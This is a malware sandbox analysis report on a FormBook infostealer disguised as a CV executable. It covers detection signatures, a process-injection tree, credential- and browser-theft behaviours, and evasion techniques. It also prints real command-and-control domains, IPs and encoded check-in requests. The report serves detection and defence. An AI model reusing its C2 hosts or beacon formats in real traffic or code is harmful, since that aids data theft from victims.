Windows Analysis Report
Maryam Farokhi-PhD- CV-1403.exe

Overview

General Information

Sample name:Maryam Farokhi-PhD- CV-1403.exe
Analysis ID:1553733
MD5:de148dc1610a111af0b004e4d0d851a4
SHA1:5ac1d2f9bd4934240c7de727bf1e42c3eab7b257
SHA256:47b2857258f743ca87c19d38ebec95a1bc1c0490341ad9f08560529bfcb861e1

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64native
  • Maryam Farokhi-PhD- CV-1403.exe (PID: 7832 cmdline: "C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe" MD5: DE148DC1610A111AF0B004E4D0D851A4)
    • Maryam Farokhi-PhD- CV-1403.exe (PID: 5192 cmdline: "C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe" MD5: DE148DC1610A111AF0B004E4D0D851A4)
      • ptzMmYcrKro.exe (PID: 7128 cmdline: "C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • netbtugc.exe (PID: 6688 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146)
          • ptzMmYcrKro.exe (PID: 7940 cmdline: "C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1368 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000002.00000002.30065570043.00000000012E0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.30063798828.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000004.00000002.33208901058.0000000003250000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000004.00000002.33207723172.0000000002C50000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000005.00000002.33208331721.0000000000860000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
2.2.Maryam Farokhi-PhD- CV-1403.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.Maryam Farokhi-PhD- CV-1403.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

No Sigma rule has matched

                AV Detection

                Source: Maryam Farokhi-PhD- CV-1403.exeReversingLabs: Detection: 36%
                Source: Yara matchFile source: 2.2.Maryam Farokhi-PhD- CV-1403.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Maryam Farokhi-PhD- CV-1403.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.30065570043.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.30063798828.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.33208901058.0000000003250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.33207723172.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.33208331721.0000000000860000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.33208982855.00000000032A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.33208941967.0000000002770000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.30065763340.00000000013C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Maryam Farokhi-PhD- CV-1403.exeJoe Sandbox ML: detected
                Source: Maryam Farokhi-PhD- CV-1403.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Maryam Farokhi-PhD- CV-1403.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: qesm.pdb source: Maryam Farokhi-PhD- CV-1403.exe
                Source: Binary string: qesm.pdbSHA256 source: Maryam Farokhi-PhD- CV-1403.exe
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ptzMmYcrKro.exe, 00000003.00000000.29988243564.0000000000A8E000.00000002.00000001.01000000.0000000A.sdmp, ptzMmYcrKro.exe, 00000005.00000002.33208908459.0000000000A8E000.00000002.00000001.01000000.0000000A.sdmp
                Source: Binary string: wntdll.pdbUGP source: Maryam Farokhi-PhD- CV-1403.exe, 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.33209248579.0000000003440000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.33209248579.000000000356D000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.30076327355.0000000003298000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.30072902814.00000000030ED000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Maryam Farokhi-PhD- CV-1403.exe, Maryam Farokhi-PhD- CV-1403.exe, 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000004.00000002.33209248579.0000000003440000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.33209248579.000000000356D000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.30076327355.0000000003298000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.30072902814.00000000030ED000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: netbtugc.pdb source: Maryam Farokhi-PhD- CV-1403.exe, 00000002.00000002.30064205277.0000000000AB8000.00000004.00000020.00020000.00000000.sdmp, ptzMmYcrKro.exe, 00000003.00000003.32061041259.0000000000C1B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: netbtugc.pdbGCTL source: Maryam Farokhi-PhD- CV-1403.exe, 00000002.00000002.30064205277.0000000000AB8000.00000004.00000020.00020000.00000000.sdmp, ptzMmYcrKro.exe, 00000003.00000003.32061041259.0000000000C1B000.00000004.00000001.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02C6C5F0 FindFirstFileW,FindNextFileW,FindClose,4_2_02C6C5F0
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then xor eax, eax4_2_02C59EE0
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then mov ebx, 00000004h4_2_037904E8

                Networking

                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49746 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49750 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49770 -> 154.23.184.95:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49758 -> 185.68.16.94:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49762 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49778 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49754 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49782 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49803 -> 104.21.56.13:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49808 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49824 -> 192.64.118.221:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49832 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49812 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49791 -> 45.79.252.94:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49836 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49766 -> 192.64.118.221:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49774 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49804 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49799 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49787 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49795 -> 43.156.106.109:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49816 -> 185.68.16.94:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49828 -> 154.23.184.95:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49820 -> 199.59.243.227:80
                Source: DNS query: www.kikaraofficial.xyz
                Source: DNS query: www.ergeneescortg.xyz
                Source: Joe Sandbox ViewIP Address: 192.64.118.221 192.64.118.221
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: Joe Sandbox ViewASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS
                Source: Joe Sandbox ViewASN Name: LILLY-ASUS LILLY-ASUS
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
                Source: global trafficHTTP traffic detected: GET /lfgb/?IBQP=jffr1tZfViqyj73DU5WRWOY43I+aPG5WiS0/lZ85bfnIBTks24N0Lwiq54kt/mVxyQrAqrDAlkCB2A8imI95kp9/KC7Gc37tvCBE0Q7f/JyzR84blKaoE+c=&Lr3=uHMLTHRPCpsdapr HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usHost: www.kikaraofficial.xyzConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                Source: global trafficHTTP traffic detected: GET /o25q/?IBQP=QpTJ7m3GW2SBpTQ/pnZIOVyum6M1OOHCKcmmJS+2kX127Zipvsw4rzpvHWp8zcGwLINz6DxgnuQsGhwCDMmXcaGTyoRGQB215b5fyWnb/5ky0ky6NfbUSoQ=&Lr3=uHMLTHRPCpsdapr HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usHost: www.6686vi38.appConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                Source: global trafficHTTP traffic detected: GET /bpf5/?IBQP=pXMEvi9dRTmSqe0Y/4GBXZDx+YOuS/91ab/OOhxfwBThN5bse0Jkmjq1VKEOxLsbrchn3SsLKrmnhDLmelrdYhtBAF1WpWB+lKbsf3p2+Ms5acdIbtU3K2Q=&Lr3=uHMLTHRPCpsdapr HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usHost: www.7fh27o.vipConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                Source: global trafficHTTP traffic detected: GET /7tio/?IBQP=cWPhyGnsppbegOPzdBDZ8kAQGuS94D1G+AoDqW+mjKcXo4pHCPC/PWAHmCcbh45dI7FSbj8dWK0Lqwzkb07fC7SLHWTv9NL+DwjYDKm9EtTm1O3Sw1W7F3k=&Lr3=uHMLTHRPCpsdapr HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usHost: www.redex.funConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                Source: global trafficHTTP traffic detected: GET /m462/?Lr3=uHMLTHRPCpsdapr&IBQP=+ctYCmnSkPlep9Adc1BBeyk16jbVmqK7c+CyNKpVFEvGl71cISvbhoUUnqNAW+fldTGCXi6FrrY6EQlGHI7/1BufmIEFBScb4VziJby0bO6di8KjpFsVcvc= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usHost: www.havan-oficial.onlineConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                Source: global trafficHTTP traffic detected: GET /baro/?IBQP=D7yMJrJ+Bz0juplqGbpVYA283ArNTbOObR02L6PPq/HBNKim//Ru1diaK3xlwJ9I24oBUaKRGGlFo6D1EDnpzzz5D4RzRliFajrOrAWZbQXn8yCyBaZzqS4=&Lr3=uHMLTHRPCpsdapr HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usHost: www.oriony.liveConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                Source: global trafficHTTP traffic detected: GET /nv0k/?Lr3=uHMLTHRPCpsdapr&IBQP=b9xh2wNitcKI3BLOmRjNajqJ0tdb3ZZVPMzZODjakpnC+heNAUn9ftCKfCQrWYHlPV0mdElsgMOd9Q6Pt9W1dBqGyTWsnEm56VmQ9Adh6JnhLBjPDA8XHds= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usHost: www.wcp95.topConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                Source: global trafficHTTP traffic detected: GET /a5kc/?IBQP=GSS8lqfirIo3qKe7Y+dCXWv0mdSKk5n/ixY/743hYinZaJ7BEmItwuPe7a8fXvxPgKT6vw3k6f8F4VRaa+UbvaitD0wR/tUqvXopoFkCCKedzBtE3j2pmTo=&Lr3=uHMLTHRPCpsdapr HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usHost: www.thesquare.worldConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                Source: global trafficHTTP traffic detected: GET /5lh9/?Lr3=uHMLTHRPCpsdapr&IBQP=PaxL/KCEHD9JblfI8738jkEyOBGmpH0n0YqV+FGo7SRz69ewzjAIy/AjxHMCTjWvQh2WDn5x5gTk9H7000rUU48po7SBA+lXfQsIcMqVCaJxO3wRg1gJgNU= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usHost: www.bocadolobopetra.netConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                Source: global trafficHTTP traffic detected: GET /ywsl/?IBQP=53+vd04YW42mc36XCB5F63IhABrVfiuEAy5fmEaureJqNK/sdjqjQsdG685okMjqTRenKpUPfuASSj1yCn6YHCZWeE+kvE1krRyqLOvcoxG1FUsRKY0MVeU=&Lr3=uHMLTHRPCpsdapr HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usHost: www.rmzl-0.restConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                Source: global trafficHTTP traffic detected: GET /jwt5/?Lr3=uHMLTHRPCpsdapr&IBQP=BaBowTLo1loeAIpV7vVht/vx80fLXkEoZngrzLsBdCIsVeqAfJzss3Y0HZ2vI18y1WvYWAn/Doi+9ZPlOuIBlgbOtHjG5I6MGjR7KAsuAsv6BFY+Gayvzv4= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usHost: www.imgiu9.vipConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                Source: global trafficHTTP traffic detected: GET /s6a5/?IBQP=uWOvS5Yjm7YhBkSIFatO2CB0bHUF5BB4gnfnOBn+6NyL3nxueSJAzVs8h9i9KFJmzD+/RgmGnJLg06gAUSOGsu+lNFioW5q3ewPUsSx7AySWAK21Xanb2Bs=&Lr3=uHMLTHRPCpsdapr HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usHost: www.premium303max.restConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                Source: global trafficHTTP traffic detected: GET /b38f/?Lr3=uHMLTHRPCpsdapr&IBQP=bEFn1h4TP97N18vCV7hUSjQIw4xMCEiPOnxtd8TYUawWIUuQfEmQCzCpa8YGfjn2jzwpUjFtNFjvXW/GU7b/pArgs0VIIQFXbRT3NlDEhxKin43O/dcn81w= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usHost: www.155n8etsy.autosConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                Source: global trafficHTTP traffic detected: GET /p1mo/?IBQP=4wGzyQ46QtXMw/BiLxl50NSbRJkEXxvch2IDA2BJPHfHfbxP6FqXRmBz/NN34NJsAG76ANum8i9g0X63XtdlCgxrKmACcwyugocACNeebq+1bjmsZbXe4Lk=&Lr3=uHMLTHRPCpsdapr HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usHost: www.uppercrust.clubConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                Source: unknown HTTP traffic detected:
                    POST /o25q/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-us
                    Host: www.6686vi38.app
                    Origin: http://www.6686vi38.app
                    Cache-Control: no-cache
                    Content-Length: 201
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Referer: http://www.6686vi38.app/o25q/
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                Source: global traffic HTTP traffic detected:
                    HTTP/1.1 404 Not Found
                    Server: nginx/1.14.1
                    Date: Mon, 11 Nov 2024 16:01:00 GMT
                    Content-Length: 0
                    Connection: close
                    X-Rate-Limit-Limit: 5s
                    X-Rate-Limit-Remaining: 19
                    X-Rate-Limit-Reset: 2024-11-11T16:01:05.9195744Z
                Source: global traffic HTTP traffic detected:
                    HTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Mon, 11 Nov 2024 16:01:52 GMT
                    Content-Type: text/html
                    Transfer-Encoding: chunked
                    Connection: close
                    x-ray: p529:0.000
                Source: global traffic HTTP traffic detected:
                    HTTP/1.1 404 Not Found
                    Date: Mon, 11 Nov 2024 16:02:11 GMT
                    Server: Apache
                    Content-Length: 389
                    Connection: close
                    Content-Type: text/html
                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic HTTP traffic detected:
                    HTTP/1.1 404 Not Found
                    Date: Mon, 11 Nov 2024 16:02:14 GMT
                    Server: Apache
                    Content-Length: 389
                    Connection: close
                    Content-Type: text/html
                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic HTTP traffic detected:
                    HTTP/1.1 404 Not Found
                    Date: Mon, 11 Nov 2024 16:02:17 GMT
                    Server: Apache
                    Content-Length: 389
                    Connection: close
                    Content-Type: text/html
                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic HTTP traffic detected:
                    HTTP/1.1 404 Not Found
                    Date: Mon, 11 Nov 2024 16:02:19 GMT
                    Server: Apache
                    Content-Length: 389
                    Connection: close
                    Content-Type: text/html; charset=utf-8
                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic HTTP traffic detected:
                    HTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Mon, 11 Nov 2024 16:02:25 GMT
                    Content-Type: text/html
                    Content-Length: 148
                    Connection: close
                    ETag: "66a747c1-94"
                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global traffic HTTP traffic detected:
                    HTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Mon, 11 Nov 2024 16:02:28 GMT
                    Content-Type: text/html
                    Content-Length: 148
                    Connection: close
                    ETag: "66a747c1-94"
                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global traffic HTTP traffic detected:
                    HTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Mon, 11 Nov 2024 16:02:31 GMT
                    Content-Type: text/html
                    Content-Length: 148
                    Connection: close
                    ETag: "66a747c1-94"
                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global traffic HTTP traffic detected:
                    HTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Mon, 11 Nov 2024 16:02:34 GMT
                    Content-Type: text/html
                    Content-Length: 148
                    Connection: close
                    ETag: "66a747c1-94"
                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global traffic HTTP traffic detected:
                    HTTP/1.1 404 Not Found
                    Server: Tengine
                    Date: Mon, 11 Nov 2024 16:03:48 GMT
                    Content-Type: text/html; charset=utf-8
                    Content-Length: 58288
                    Connection: close
                    Vary: Accept-Encoding
                    ETag: "6729ca88-e3b0"
                Source: global traffic HTTP traffic detected:
                    HTTP/1.1 404 Not Found
                    Server: Tengine
                    Date: Mon, 11 Nov 2024 16:03:51 GMT
                    Content-Type: text/html; charset=utf-8
                    Content-Length: 58288
                    Connection: close
                    Vary: Accept-Encoding
                    ETag: "6729ca88-e3b0"
                Source: global traffic HTTP traffic detected:
                    HTTP/1.1 404 Not Found
                    Server: Tengine
                    Date: Mon, 11 Nov 2024 16:03:55 GMT
                    Content-Type: text/html; charset=utf-8
                    Content-Length: 58288
                    Connection: close
                    Vary: Accept-Encoding
                    ETag: "6729ca88-e3b0"
                Source: global traffic HTTP traffic detected:
                    HTTP/1.1 404 Not Found
                    Server: Tengine
                    Date: Mon, 11 Nov 2024 16:03:57 GMT
                    Content-Type: text/html; charset=utf-8
                    Content-Length: 58288
                    Connection: close
                    Vary: Accept-Encoding
                    ETag: "6729ca88-e3b0"
                Source: global traffic HTTP traffic detected:
                    HTTP/1.1 404 Not Found
                    Server: nginx/1.14.1
                    Date: Mon, 11 Nov 2024 16:04:42 GMT
